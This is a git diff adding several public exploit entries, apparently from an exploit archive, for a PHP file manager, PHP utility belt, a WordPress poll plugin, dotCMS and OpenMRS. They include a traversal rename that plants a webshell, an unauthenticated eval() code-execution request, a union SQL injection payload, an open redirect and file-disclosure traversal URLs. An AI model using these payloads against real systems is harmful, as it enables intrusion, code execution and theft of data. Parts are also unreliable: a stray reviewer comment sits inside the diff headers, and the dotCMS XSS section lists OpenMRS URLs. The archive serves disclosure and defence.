+2. Change File Extension(.txt -> .php or .html) & Upload Path Tampering(/userfiles -> /)
+
+GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=rename&old=%2Fvul_test%2Ftarget%2FFilemanager%2Fuserfiles%2Fshell.txt&new=....//shell.php&config=filemanager.config.js HTTP/1.1
+Host: 192.168.0.15
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.0.15/vul_test/target/Filemanager/
+Connection: keep-alive
+
+
+3. Call Uploaded File
+
+http://192.168.0.15/vul_test/target/Filemanager/userfiles/shell.php
+
+Response
+HTTP/1.1 200 OK
+Date: Tue, 08 Dec 2015 17:25:20 GMT
+Server: Apache/2.2.16 (Debian)
+X-Powered-By: PHP/5.3.3-7+squeeze19
+Vary: Accept-Encoding
+Content-Length: 32
+Keep-Alive: timeout=15, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+
+echo "Write PHP WebShell Code";
+
+
+
+
diff --git a/platforms/php/webapps/38901.txt b/platforms/php/webapps/38901.txt
new file mode 100755
index 000000000..fbbd3810e
--- /dev/null
+++ b/platforms/php/webapps/38901.txt
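Review bot: The "Filtering Rules" / "Bypass Filtering" lines name the root cause — a single-pass removal of `../` that `....//` survives — but the entry stops there and gives no remediation, so anyone using it to verify a fix has nothing to check against. A line such as `Fix: resolve the requested path with realpath() and reject it unless it lies under the configured root directory; do not rely on stripping traversal sequences` would close that gap, and the same canonicalisation applies to the `new=....//shell.php` rename in step 2, which leaves `userfiles` by the identical trick. The two "# CVE : none" headers could also carry a vendor issue or commit reference once one exists, as the entry otherwise has no pointer to a fixed version.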
@@ -0,0 +1,28 @@
+Exploit Title : PHP utility belt Remote Code Execution vulnerability
+Author : WICS
+Date : 8/12/2015
+Software Link : https://github.com/mboynes/php-utility-belt
+
+Overview:
+
+
+PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.
+ajax.php is accessible without any authentication
+
+Vulnerable code (Line number 12 to 15)
+
+if ( isset( $_POST['code'] ) ) {
+ if ( false === eval( $_POST['code'] ) )
+ echo 'PHP Error encountered, execution halted';
+}
+
+
+POC
+Access URL
+http://127.0.0.1/php-utility-belt/ajax.php
+in Post data type
+code=fwrite(fopen('info.php','w'),'');
+
+above code will generate info.php file which will display php info
+Shell link will be
+http://127.0.0.1/php-utility-belt/info.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38902.txt b/platforms/php/webapps/38902.txt
new file mode 100755
index 000000000..6e78a54b6
--- /dev/null
+++ b/platforms/php/webapps/38902.txt
@@ -0,0 +1,29 @@
+Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability
+Author : WICS
+Date : 7/12/2015
+Software Link : https://wordpress.org/plugins/polls-widget/
+Affected Version: 1.0.7 and below
+
+
+Overview:
+
+
+Poll widget is wordpress plugin which provide fancy user Polling layout to website users and user can vote according to options provided in specific poll.
+This plugin has 2000+ active installations.
+Vulnerability exist in front_end.php file in which code is not filtering user supplied data on parameter question_id
+line no. 36 $question_id=$_POST['question_id'];
+....
+....
+line no. 94--> $answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A);
+ print_r(json_encode($answer, JSON_FORCE_OBJECT));
+
+this script is vulnerable to union based sql injection with column count 2
+
+
+POC
+
+http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues
+
+in post data, add this
+
+question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5
diff --git a/platforms/php/webapps/38906.txt b/platforms/php/webapps/38906.txt
new file mode 100755
index 000000000..4493a0954
--- /dev/null
+++ b/platforms/php/webapps/38906.txt
@@ -0,0 +1,120 @@
+
+dotCMS 3.2.4 Multiple Vulnerabilities
+
+
+Vendor: dotCMS Software, LLC
+Product web page: http://www.dotcms.com
+Affected version: 3.2.4 (Enterprise)
+
+Summary: DotCMS is the next generation of Content Management System (CMS).
+Quick to deploy, open source, Java-based, open APIs, extensible and massively
+scalable, dotCMS can rapidly deliver personalized, engaging multi-channel
+sites, web apps, campaigns, one-pagers, intranets - all types of content
+driven experiences - without calling in your developers.
+
+Desc: The application suffers from multiple security vulnerabilities including:
+Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request
+Forgery (CSRF).
+
+Tested on: Apache-Coyote/1.1
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2015-5290
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php
+
+Vendor: http://dotcms.com/docs/latest/change-log
+ https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305
+ https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3
+
+
+19.11.2015
+
+--
+
+
+1. Open Redirect via '_EXT_LANG_redirect' GET parameter:
+--------------------------------------------------------
+
+http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia
+
+
+
+2. CSRF Add Admin:
+------------------
+
+
+
+
+
+
+
+
+
+
+
+
+3. Multiple Stored And Reflected XSS:
+-------------------------------------
+
+POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1
+Host: 127.0.0.1
+
+callCount=1
+windowName=c0-param0
+c0-scriptName=TagAjax
+c0-methodName=addTag
+c0-id=0
+c0-param0=
+
+http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addName parameter]
+http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter]
+http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter]
+http://127.0.0.1:8080/openmrs/admin/users/users.list [Referer HTTP header]
+http://127.0.0.1:8080/openmrs/admin/users/user.form [userId parameter]
+http://127.0.0.1:8080/openmrs/options.form [defaultLocation parameter]
+http://127.0.0.1:8080/openmrs/options.form [lang parameter]
+http://127.0.0.1:8080/openmrs/options.form [newPassword parameter]
+http://127.0.0.1:8080/openmrs/options.form [oldPassword parameter]
+http://127.0.0.1:8080/openmrs/options.form [personName.familyName parameter]
+http://127.0.0.1:8080/openmrs/options.form [personName.givenName parameter]
+http://127.0.0.1:8080/openmrs/options.form [secretAnswerNew parameter]
+http://127.0.0.1:8080/openmrs/options.form [secretQuestionPassword parameter]
+http://127.0.0.1:8080/openmrs/options.form [username parameter]
+http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [addUserAccount parameter]
+http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [familyName parameter]
+http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [gender parameter]
+http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [givenName parameter]
+http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [username parameter]
+http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [definitionUiResource parameter]
+http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [returnUrl parameter]
+http://127.0.0.1:8080/openmrs/login.htm [sessionLocation parameter]
+http://127.0.0.1:8080/openmrs/referenceapplication/userApp.page [action parameter]
+http://127.0.0.1:8080/openmrs/uicommons/messages/get.action [codes parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [description parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [name parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parameterName parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parentUUID parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [reportId parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/reportMacros.form [macros parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [reportSchemaId parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [xml parameter]
+http://127.0.0.1:8080/openmrs/admin/reports/runReport.form [schedule parameter]
+http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter]
+http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm [id parameter]
+http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [cancelCallback parameter]
+http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [label parameter]
+http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [saveCallback parameter]
+http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [valueType parameter]
+http://127.0.0.1:8080/openmrs/module/metadatasharing/export/edit.form [type parameter]
+http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [concept parameter]
+http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [instructions parameter]
+http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [orderType parameter]
+http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [patient parameter]
+http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addAge parameter]
+http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter]
+http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter]
+http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [description parameter]
+http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [name parameter]
+http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [taskClass parameter]
+http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.list [taskId parameter]
+http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter]
+http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben_GB%5D.name parameter]
+http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bfr%5D.name parameter]
+http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bht%5D.name parameter]
+http://127.0.0.1:8080/openmrs/dictionary/concept.form [synonymsByLocale%5Ben%5D%5B0%5D.name parameter]
+http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [description parameter]
+http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [name parameter]
+http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [ruleContent parameter]
+http://127.0.0.1:8080/openmrs/module/logic/logic.form [patientId parameter]
+http://127.0.0.1:8080/openmrs/patientDashboard.form [patientGraphConcept parameter]
\ No newline at end of file
diff --git a/platforms/xml/webapps/38899.txt b/platforms/xml/webapps/38899.txt
new file mode 100755
index 000000000..db32ef505
--- /dev/null
+++ b/platforms/xml/webapps/38899.txt
@@ -0,0 +1,45 @@
+OpenMRS 2.3 (1.11.4) Local File Disclosure Vulnerability
+
+
+Vendor: OpenMRS Inc.
+Product web page: http://www.openmrs.org
+Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
+ OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))
+
+Summary: OpenMRS is an application which enables design
+of a customized medical records system with no programming
+knowledge (although medical and systems analysis knowledge
+is required). It is a common framework upon which medical
+informatics efforts in developing countries can be built.
+
+Desc: OpenMRS suffers from a file disclosure vulnerability
+when input passed thru the 'url' parameter to viewPortlet.htm
+script is not properly verified before being used to include
+files. This can be exploited to include files from local
+resources with directory traversal attacks.
+
+
+Tested on: Ubuntu 12.04.5 LTS
+ Apache Tomcat/7.0.26
+ Apache Tomcat/6.0.36
+ Apache Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2015-5286
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5286.php
+
+Vendor: https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868
+
+
+02.11.2015
+
+--
+
+
+http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d
+http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportProcessorPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx
+http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fMETA-INF%2fmaven%2forg.openmrs.web%2fopenmrs-webapp%2fpom.xml%3bx%3d
\ No newline at end of file